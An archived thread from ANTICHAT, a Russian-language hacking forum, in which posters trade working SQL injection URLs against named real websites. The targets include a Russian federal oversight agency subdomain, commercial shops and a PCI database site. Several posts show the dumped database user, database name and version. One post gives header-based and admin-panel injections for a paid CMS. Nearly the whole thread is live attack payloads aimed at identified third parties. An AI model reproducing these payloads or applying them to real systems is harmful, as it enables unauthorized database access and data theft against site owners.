ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
09.01.2013, 03:04
|
|
Guest
Сообщений: n/a
Провел на форуме:
77731
Репутация:
33
|
|
Код:
Code:
http://www.syriacorthodox-mlb.org/news.php?id=-793+union+select+1,CONCAT_WS%28CHAR%2832,58,32%29,user%28%29,database%28%29,version%28%29%29,3,4,5,6--
asmarpr1_syriac@localhost : asmarpr1_syriac : 5.1.66-cll |
|
|
|
10.01.2013, 00:31
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
gosnadzor.ru Федеральная служба по экологическому, технологическому и атомному надзору России
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//szap.gosnadzor.ru/news/terrnews.html?id=828+or+1+group+by+concat%28%28select+version%28%29%29,0x00,floor%28rand%280%29*2%29%29having+min%280%29+or+1--+[/COLOR][/COLOR]
Яндекс тИЦ (CY) 3500
Google PageRank (PR) 6
5.1.66
|
|
|
|
10.01.2013, 00:52
|
|
Guest
Сообщений: n/a
Провел на форуме:
77731
Репутация:
33
|
|
Код:
Code:
http://www.belifrost.com/p roducts.php?id=-1 4+u nion+sel ect+1, C ONCAT_WS%28C HA R%2832,58,32%29,user%28%29,database%28%29,version%28%29%29,3,4,5,6,7, 8--
asmarpr1_belif@localhost : asmarpr1_belifrost : 5.1.66-cll |
|
|
|
10.01.2013, 15:56
|
|
Новичок
Регистрация: 26.04.2010
Сообщений: 26
Провел на форуме:
136979
Репутация:
53
|
|
http://www.windward-islands.net/crewed/yacht-us.php?ID=-254+union+select+1,2,3,login,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19+FROM+Admin+limit+0,1--+
PR:4
ТИЦ:10
|
|
|
11.01.2013, 00:06
|
|
Guest
Сообщений: n/a
Провел на форуме:
77731
Репутация:
33
|
|
Код:
Code:
http://www.360.is/index.php?pid=261&cid=-2141+union+select+1,2,3,4,5,6,CONCAT_WS%28CHAR%2832,58,32%29,user%28%29,datab ase%28 %29,versi on%28%29%29,8,9,10, 1 1,12,13,14--
|
|
|
|
13.01.2013, 20:12
|
|
Познающий
Регистрация: 06.06.2008
Сообщений: 76
Провел на форуме:
117639
Репутация:
55
|
|
Код:
Code:
http://www.stock-software.com/news/subcategory.php?subcatid=186+and+1=2+union+select+1,user%28%29,3,4+--+
http://www.wholesalewigs.net/ViewItem.php?ItemID=219%27+and+1=2+UNION%20SELECT%201,2,3,4,5,user%28%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+--+&subbrand=20&brandname=Revlon&brandid=16&brandtype=1&source=index.php
|
|
|
|
14.01.2013, 14:45
|
|
Guest
Сообщений: n/a
Провел на форуме:
77731
Репутация:
33
|
|
Код:
Code:
h ttp: //www.firstgulf .com/search-d etails.ph p?id=-23+un ion+select+1,ve rsion(),u ser(),4,da tabase(),6,7,8,9,10,11--
|
|
|
|
16.01.2013, 23:03
|
|
Guest
Сообщений: n/a
Провел на форуме:
109228
Репутация:
124
|
|
Код:
Code:
http://www.newtonsapple.tv/video.php?id=1g671'/*!union*/select+1,2,3,4,5,6,7,8,9,10,@@version,12,13,14,15+--+
http://www.dialysisunits.com/unit.php?id=-12552+union+select+1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+--+
http://landscrona.ru/media/index.php?id=-3594+union+select+1,2,3,@@version,5,6,7,8,9,10,11,12,13,14,15+--+
http://www.pcidatabase.com/vendor_details.php?id=-606+union+select+1,2,3,4,@@version,6,7,8,9,10,11,12,13,14,15+--+
|
|
|
|
17.01.2013, 03:26
|
|
Guest
Сообщений: n/a
Провел на форуме:
103014
Репутация:
76
|
|
Платная модульная cms. Множественные уязвимости. До исходников добраться не получилось для полноценного репорта, поэтому только самое критичное(хотя и не особенно ее покупают, судя по всему ).
sql-inj в каком-то из скриптов сбора статистики.
Request Headers:
Host:www.jcms.ru
X-Forwarded-For: 127.0.0.1')on duplicate key update h=(select 1 from(select count(*),concat((select(select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)h)#
Response Content:
Software error:
DBD::mysql::st execute failed: Duplicate entry ' 5.0.901' for key 1 at /MySQL.cgi line 12.
sql-inj в демо-админке:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//demo.jcms.ru/cgi-bin/admin.cgi?login=demo&password=demo&action=photogallery_photogallery_edit&JCMSPhotoGalleryAlbumId=-3' union select 1,version(),3,4,5,6,7,8,9,10+--+h[/COLOR][/COLOR]
Главная админка http://jcms.ru/cgi-bin/admin.cgi
Разработчик уведомлён, реакции не последовало. |
|
|
|
18.01.2013, 12:52
|
|
Познающий
Регистрация: 28.07.2009
Сообщений: 98
Провел на форуме:
247684
Репутация:
136
|
|
подыскивая себе водный транспорт, наткнулся на это...
http://www.wellboat-spb.ru/caters.php?id=-20%20and%201=2%20union%20select%201,concat_ws(0x3a ,version(),user(),database(),@@version_compile_os) ,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ,22,23,24,25,26,27,28%20--
5.0.77-log wellboat_spb@localhost wellboat_spb pc-linux-gnu |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
